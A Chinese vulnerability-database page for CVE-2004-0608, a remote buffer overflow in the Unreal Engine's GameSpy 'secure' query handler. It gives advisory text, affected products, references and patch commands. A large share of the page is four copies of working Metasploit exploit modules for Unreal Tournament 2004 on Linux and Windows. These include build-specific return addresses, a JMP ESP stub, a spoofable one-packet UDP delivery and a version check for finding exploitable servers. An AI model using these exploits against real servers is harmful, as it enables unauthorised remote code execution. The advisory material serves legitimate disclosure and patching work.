CVE-2004-0608
CVSS10.0
发布时间 :2004-12-06 00:00:00
修订时间 :2016-10-17 22:46:40
NMCOEPS    

[原文]The Unreal Engine, as used in DeusEx 1.112fm and earlier, Devastation 390 and earlier, Mobile Forces 20000 and earlier, Nerf Arena Blast 1.2 and earlier, Postal 2 1337 and earlier, Rune 107 and earlier, Tactical Ops 3.4.0 and earlier, Unreal 1 226f and earlier, Unreal II XMP 7710 and earlier, Unreal Tournament 451b and earlier, Unreal Tournament 2003 2225 and earlier, Unreal Tournament 2004 before 3236, Wheel of Time 333b and earlier, and X-com Enforcer, allows remote attackers to execute arbitrary code via a UDP packet containing a secure query with a long value, which overwrites memory.


[CNNVD]Epic Games Unreal Engine Secure Query缓冲区溢出漏洞(CNNVD-200412-011)

        
        Unreal引擎是一款被很多游戏使用的网络游戏引擎。
        Unreal引擎在处理游戏请求时存在漏洞,远程攻击者可能利用此漏洞在游戏服务器上执行任意指令或导致拒绝服务。
        Unreal引擎对畸形的带超长参数的GameSpy 'secure'请求未能做正确的处理,远程攻击者通过超长的请求导致内存破坏,可能执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:epic_games:unreal_tournament_2003:2199_macos
cpe:/a:epic_games:unreal_tournament_2003:2225_win32
cpe:/a:epic_games:unreal_engine:226f
cpe:/a:epic_games:unreal_tournament_2004:macos
cpe:/a:running_with_scissors:postal_2:1337
cpe:/a:epic_games:unreal_tournament:451b
cpe:/a:epic_games:unreal_tournament_2003:2225_macos
cpe:/a:dreamforge:tnn_outdoors_pro_hunter
cpe:/a:epic_games:unreal_tournament_2004:win32
cpe:/a:infogrames:x-com_enforcer
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/a:nerf_arena_blast:nerf_arena_blast:1.2
cpe:/a:epic_games:unreal_engine:436
cpe:/a:infogrames:tacticalops:3.4
cpe:/a:epic_games:unreal_engine:433
cpe:/a:epic_games:unreal_tournament_2003:2199_linux
cpe:/a:epic_games:unreal_tournament_2003:2199_win32
cpe:/a:ion_storm:deusex:1.112_fm
cpe:/a:rage_software:mobile_forces:20000.0
cpe:/a:robert_jordan:wheel_of_time:333.0b
cpe:/a:arush:devastation:390.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0608
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0608
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-011
(官方数据源) CNNVD

- 其它链接及资源

http://aluigi.altervista.org/adv/unsecure-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/unsecure-adv.txt
http://marc.info/?l=bugtraq&m=108787105023304&w=2
(UNKNOWN)  BUGTRAQ  20040618 Code execution in the Unreal Engine through \secure\ packet
http://www.gentoo.org/security/en/glsa/glsa-200407-14.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200407-14
http://www.securityfocus.com/bid/10570
(VENDOR_ADVISORY)  BID  10570
http://xforce.iss.net/xforce/xfdb/16451
(VENDOR_ADVISORY)  XF  unreal-secure-query-command-execute(16451)

- 漏洞信息

Epic Games Unreal Engine Secure Query缓冲区溢出漏洞
危急 边界条件错误
2004-12-06 00:00:00 2005-10-20 00:00:00
远程  
        
        Unreal引擎是一款被很多游戏使用的网络游戏引擎。
        Unreal引擎在处理游戏请求时存在漏洞,远程攻击者可能利用此漏洞在游戏服务器上执行任意指令或导致拒绝服务。
        Unreal引擎对畸形的带超长参数的GameSpy 'secure'请求未能做正确的处理,远程攻击者通过超长的请求导致内存破坏,可能执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Epic Games
        ----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.epicgames.com/

- 漏洞信息 (10032)

Unreal Tournament 2004 "Secure" Overflow (EDBID:10032)
linux remote
2004-07-18 Verified
7787 onetwo
N/A [点击下载]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
			'Description'    => %q{
				
			This is an exploit for the GameSpy secure query in
			the Unreal Engine.

			This exploit only requires one UDP packet, which can
			be both spoofed and sent to a broadcast address.
			Usually, the GameSpy query server listens on port 7787,
			but you can manually specify the port as well.

			The RunServer.sh script will automatically restart the
			server upon a crash, giving us the ability to
			bruteforce the service and exploit it multiple
			times. 
					
			},
			'Author'         => [ 'onetwo' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
				    	[ 'CVE', '2004-0608'],
					[ 'OSVDB', '7217'],
					[ 'BID', '10570'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x5c\x00",

				},
			'Platform'       => 'linux',
			'Targets'        => 
				[
					['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
					['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
				],
			'DisclosureDate' => 'Jun 18 2004'))

			register_options(
				[
					Opt::RPORT(7787)
				], self.class)
	end
		
	def exploit
		connect_udp
		
		buf = make_nops(1024)
		buf[24, 4] = [target['Rets'][1]].pack('V')
		buf[44, 4] = [target['Rets'][0]].pack('V')
		buf[56, 4] = [target['Rets'][1]].pack('V')	
		buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP
		
		buf[0,  8] = "\\secure\\"
		buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
	
		udp_sock.put(buf)	
		
		handler
		disconnect_udp
	end
	
	def ut_version
		connect_udp
		udp_sock.put("\\basic\\")
		res = udp_sock.recvfrom(8192)
		disconnect_udp	
		
		if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
			return m[1]
		end
		
		return
	end
	
	def check
		vers = ut_version
		
		if (not vers)
			print_status("Could not detect Unreal Tournament Server")
			return
		end
		
		print_status("Detected Unreal Tournament Server Version: #{vers}")
		if (vers =~ /^(3120|3186|3204)$/)
			print_status("This system appears to be exploitable")
			return Exploit::CheckCode::Appears
		end
		
		
		if (vers =~ /^(2...)$/)
			print_status("This system appears to be running UT2003")
			return Exploit::CheckCode::Detected
		end
		
		print_status("This system appears to be patched")
		return Exploit::CheckCode::Safe
	end

end
		

- 漏洞信息 (16693)

Unreal Tournament 2004 "secure" Overflow (Win32) (EDBID:16693)
windows remote
2010-09-20 Verified
7787 metasploit
N/A [点击下载]
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Win32)',
			'Description'    => %q{

			This is an exploit for the GameSpy secure query in
			the Unreal Engine.

			This exploit only requires one UDP packet, which can
			be both spoofed and sent to a broadcast address.
			Usually, the GameSpy query server listens on port 7787,
			but you can manually specify the port as well.

			The RunServer.sh script will automatically restart the
			server upon a crash, giving us the ability to
			bruteforce the service and exploit it multiple
			times.

			},
			'Author'         => [ 'stinko' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2004-0608'],
					[ 'OSVDB', '7217'],
					[ 'BID', '10570'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x5c\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp
				],
			'DisclosureDate' => 'Jun 18 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(7787)
			], self.class)

	end

	def exploit
		connect_udp

		buf = make_nops(1024)
		buf[0, 60] = [target['Rets'][0]].pack('V') * 15
		buf[54, 4] = [target['Rets'][1]].pack('V')
		buf[0,  8] = "\\secure\\"
		buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		handler
		disconnect_udp
	end

	def ut_version
		connect_udp
		udp_sock.put("\\basic\\")
		res = udp_sock.recvfrom(8192)
		disconnect_udp

		if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
			return m[1]
		end

		return
	end

	def check
		vers = ut_version

		if (not vers)
			print_status("Could not detect Unreal Tournament Server")
			return
		end

		print_status("Detected Unreal Tournament Server Version: #{vers}")
		if (vers =~ /^(3120|3186|3204)$/)
			print_status("This system appears to be exploitable")
			return Exploit::CheckCode::Appears
		end


		if (vers =~ /^(2...)$/)
			print_status("This system appears to be running UT2003")
			return Exploit::CheckCode::Detected
		end

		print_status("This system appears to be patched")
		return Exploit::CheckCode::Safe
	end

end
		

- 漏洞信息 (16848)

Unreal Tournament 2004 "secure" Overflow (Linux) (EDBID:16848)
linux remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
			'Description'    => %q{
					This is an exploit for the GameSpy secure query in
				the Unreal Engine.

				This exploit only requires one UDP packet, which can
				be both spoofed and sent to a broadcast address.
				Usually, the GameSpy query server listens on port 7787,
				but you can manually specify the port as well.

				The RunServer.sh script will automatically restart the
				server upon a crash, giving us the ability to
				bruteforce the service and exploit it multiple
				times.
			},
			'Author'         => [ 'onetwo' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2004-0608'],
					[ 'OSVDB', '7217'],
					[ 'BID', '10570'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x5c\x00",

				},
			'Platform'       => 'linux',
			'Targets'        =>
				[
					['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
					['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
				],
			'DisclosureDate' => 'Jun 18 2004'))

		register_options(
			[
				Opt::RPORT(7787)
			], self.class)
	end

	def exploit
		connect_udp

		buf = make_nops(1024)
		buf[24, 4] = [target['Rets'][1]].pack('V')
		buf[44, 4] = [target['Rets'][0]].pack('V')
		buf[56, 4] = [target['Rets'][1]].pack('V')
		buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP

		buf[0,  8] = "\\secure\\"
		buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		handler
		disconnect_udp
	end

	def ut_version
		connect_udp
		udp_sock.put("\\basic\\")
		res = udp_sock.recvfrom(8192)
		disconnect_udp

		if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
			return m[1]
		end

		return
	end

	def check
		vers = ut_version

		if (not vers)
			print_status("Could not detect Unreal Tournament Server")
			return
		end

		print_status("Detected Unreal Tournament Server Version: #{vers}")
		if (vers =~ /^(3120|3186|3204)$/)
			print_status("This system appears to be exploitable")
			return Exploit::CheckCode::Appears
		end


		if (vers =~ /^(2...)$/)
			print_status("This system appears to be running UT2003")
			return Exploit::CheckCode::Detected
		end

		print_status("This system appears to be patched")
		return Exploit::CheckCode::Safe
	end

end
		

- 漏洞信息 (F82230)

Unreal Tournament 2004 Overflow (PacketStormID:F82230)
2009-10-27 00:00:00
onetwo  
exploit,udp,spoof
CVE-2004-0608
[点击下载]

This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
			'Description'    => %q{
				
			This is an exploit for the GameSpy secure query in
			the Unreal Engine.

			This exploit only requires one UDP packet, which can
			be both spoofed and sent to a broadcast address.
			Usually, the GameSpy query server listens on port 7787,
			but you can manually specify the port as well.

			The RunServer.sh script will automatically restart the
			server upon a crash, giving us the ability to
			bruteforce the service and exploit it multiple
			times. 
					
			},
			'Author'         => [ 'onetwo' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
				    	[ 'CVE', '2004-0608'],
					[ 'OSVDB', '7217'],
					[ 'BID', '10570'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x5c\x00",

				},
			'Platform'       => 'linux',
			'Targets'        => 
				[
					['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
					['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
				],
			'DisclosureDate' => 'Jun 18 2004'))

			register_options(
				[
					Opt::RPORT(7787)
				], self.class)
	end
		
	def exploit
		connect_udp
		
		buf = make_nops(1024)
		buf[24, 4] = [target['Rets'][1]].pack('V')
		buf[44, 4] = [target['Rets'][0]].pack('V')
		buf[56, 4] = [target['Rets'][1]].pack('V')	
		buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP
		
		buf[0,  8] = "\\secure\\"
		buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
	
		udp_sock.put(buf)	
		
		handler
		disconnect_udp
	end
	
	def ut_version
		connect_udp
		udp_sock.put("\\basic\\")
		res = udp_sock.recvfrom(8192)
		disconnect_udp	
		
		if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
			return m[1]
		end
		
		return
	end
	
	def check
		vers = ut_version
		
		if (not vers)
			print_status("Could not detect Unreal Tournament Server")
			return
		end
		
		print_status("Detected Unreal Tournament Server Version: #{vers}")
		if (vers =~ /^(3120|3186|3204)$/)
			print_status("This system appears to be exploitable")
			return Exploit::CheckCode::Appears
		end
		
		
		if (vers =~ /^(2...)$/)
			print_status("This system appears to be running UT2003")
			return Exploit::CheckCode::Detected
		end
		
		print_status("This system appears to be patched")
		return Exploit::CheckCode::Safe
	end

end

    

- 漏洞信息

7217
Unreal Engine Secure Query Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public, Exploit Commercial

- 漏洞描述

The Unreal Engine contains a flaw that may be exploited by a malicious user to cause a buffer overflow. The issue is triggered when a remote attacker sends an excessively long value to a game server via the GameSpy 'secure' query protocol. It is possible that the flaw may allow remote code execution or denial of service.

- 时间线

2004-06-18 2004-05-24
2004-06-18 Unknow

- 解决方案

Upgrade to UnrealTournament 2004 version 3236 or higher, as it has been reported to fix this vulnerability. There are no other upgrades or patches known to fix the vulnerability at this time. It may be possible to correct the flaw or prevent exploitation by implementing one or more workaround(s). Links are provided as Other Solution URL's in the external references section.

- 相关参考

- 漏洞作者

- 漏洞信息

Epic Games Unreal Engine Memory Corruption Vulnerability
Boundary Condition Error 10570
Yes No
2004-06-18 12:00:00 2009-07-12 05:16:00
Discovery is credited to Luigi Auriemma <aluigi@autistici.org>.

- 受影响的程序版本

Running With Scissors Postal 2 1337
Robert Jordan Wheel of Time 333.0 b
Rage Software Mobile Forces 20000.0
Nerf Arena Blast Nerf Arena Blast 1.2
Ion Storm DeusEx 1.112 fm
Infogrames X-com Enforcer
Infogrames TacticalOps 3.4
Gentoo Linux 1.4
Epic Games Unreal Tournament 3 1.3beta4
Epic Games Unreal Tournament 2004 win32
Epic Games Unreal Tournament 2004 macOS
Epic Games Unreal Tournament 2003 2225 win32
Epic Games Unreal Tournament 2003 2225 macOS
Epic Games Unreal Tournament 2003 2199 win32
Epic Games Unreal Tournament 2003 2199 macOS
Epic Games Unreal Tournament 2003 2199 linux
Epic Games Unreal Engine 436
+ ARUSH Devastation 390.0
+ ARUSH Devastation 381.0
+ ARUSH Devastation 380.0
+ Atari Magic The Gathering: Battlegrounds 1.4
+ Atari Magic The Gathering: Battlegrounds 1.3
+ Atari Magic The Gathering: Battlegrounds 1.2
+ Atari Magic The Gathering: Battlegrounds 1.1
+ Atari Magic The Gathering: Battlegrounds 1.0
+ Atari Nerf Arena Blast
+ Eidos DeusEx 1.2
+ Eidos DeusEx 1.1
+ Eidos DeusEx 1.0
+ Human Head Studios Rune 1.0.1
+ Human Head Studios Rune 1.0
+ Microprose Software Star Trek: Klingon Honor Guard
+ Microprose Software Tactical Ops 3.4
+ Microprose Software Tactical Ops 3.3
+ Microprose Software Tactical Ops 3.2
+ Microprose Software Tactical Ops 3.1
+ Microprose Software Tactical Ops 3.0
+ Rage Software Mobile Forces
+ Running With Scissors Postal 2
+ UBI Soft Rainbow Six: Raven Shield 1.5
+ UBI Soft Rainbow Six: Raven Shield 1.4
+ UBI Soft Rainbow Six: Raven Shield 1.3
+ UBI Soft Rainbow Six: Raven Shield 1.2
+ UBI Soft Rainbow Six: Raven Shield 1.1
+ UBI Soft Rainbow Six: Raven Shield 1.0
+ United States Department of Defense America's Army 2.0 .0
+ United States Department of Defense America's Army: SFAS 2.0 .0a
+ United States Department of Defense America's Army: SFAS 1.9 .0
Epic Games Unreal Engine 3
Epic Games Unreal Engine 226f
DreamForge TNN Outdoors Pro Hunter
ARUSH Devastation 390.0
United States Department of Defense America's Army: SFAS 2.0 .0a
United States Department of Defense America's Army: SFAS 1.9 .0
United States Department of Defense America's Army 2.0 .0
UBI Soft XIII
UBI Soft Splinter Cell Pandora Tomorrow
UBI Soft Rainbow Six: Raven Shield 1.5
UBI Soft Rainbow Six: Raven Shield 1.4
UBI Soft Rainbow Six: Raven Shield 1.3
UBI Soft Rainbow Six: Raven Shield 1.2
UBI Soft Rainbow Six: Raven Shield 1.1
UBI Soft Rainbow Six: Raven Shield 1.0
Microprose Software Star Trek: Klingon Honor Guard
Human Head Studios Dead Man's Hand
Epic Games Unreal Tournament 2004 3236
Atari Magic The Gathering: Battlegrounds 1.4
Atari Magic The Gathering: Battlegrounds 1.3
Atari Magic The Gathering: Battlegrounds 1.2
Atari Magic The Gathering: Battlegrounds 1.1
Atari Magic The Gathering: Battlegrounds 1.0

- 不受影响的程序版本

United States Department of Defense America's Army: SFAS 2.0 .0a
United States Department of Defense America's Army: SFAS 1.9 .0
United States Department of Defense America's Army 2.0 .0
UBI Soft XIII
UBI Soft Splinter Cell Pandora Tomorrow
UBI Soft Rainbow Six: Raven Shield 1.5
UBI Soft Rainbow Six: Raven Shield 1.4
UBI Soft Rainbow Six: Raven Shield 1.3
UBI Soft Rainbow Six: Raven Shield 1.2
UBI Soft Rainbow Six: Raven Shield 1.1
UBI Soft Rainbow Six: Raven Shield 1.0
Microprose Software Star Trek: Klingon Honor Guard
Human Head Studios Dead Man's Hand
Epic Games Unreal Tournament 2004 3236
Atari Magic The Gathering: Battlegrounds 1.4
Atari Magic The Gathering: Battlegrounds 1.3
Atari Magic The Gathering: Battlegrounds 1.2
Atari Magic The Gathering: Battlegrounds 1.1
Atari Magic The Gathering: Battlegrounds 1.0

- 漏洞讨论

Unreal Engine is reportedly prone to a memory corruption vulnerability. This issue presents itself when a remote attacker sends an excessive value to a vulnerable game server through a '\secure\' query.

An attacker can exploit this issue to potentially overwrite sensitive memory addresses leading to a variety of attacks including denial of service and possible remote code execution.

- 漏洞利用

A proof of concept is available at the following location:
http://aluigi.altervista.org/poc/unsecure.zip

An Exploit has been released for this issue as part of the Metasploit Framework project version 2.2. Various other exploits have been released as well. Please see the Metasploit exploits site in Web references for more information.

Exploit code for the Linux platform is available as well.

- 解决方案

It is reported that Patch 3236 addresses this problem in Unreal Tournament 2004.

Gentoo Linux has released advisory GLSA 200407-14 addressing this issue. Please see the referenced advisory for further information. Users of affected packages are urged to execute the following command as the superuser:
emerge sync

Then, depending on the package(s) currently installed, execute the appropriate following commands as superuser:
emerge -pv ">=games-fps/ut2003-2225-r3"
emerge ">=games-fps/ut2003-2225-r3"
emerge -pv ">=games-server/ut2003-ded-2225-r2"
emerge ">=games-server/ut2003-ded-2225-r2"
emerge -pv ">=games-fps/ut2004-3236"
emerge ">=games-fps/ut2004-3236"
emerge -pv ">=games-fps/ut2004-demo-3120-r4"
emerge ">=games-fps/ut2004-demo-3120-r4"

Currently we are not aware of any other vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


Epic Games Unreal Tournament 2004 macOS

Epic Games Unreal Tournament 2004 win32

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站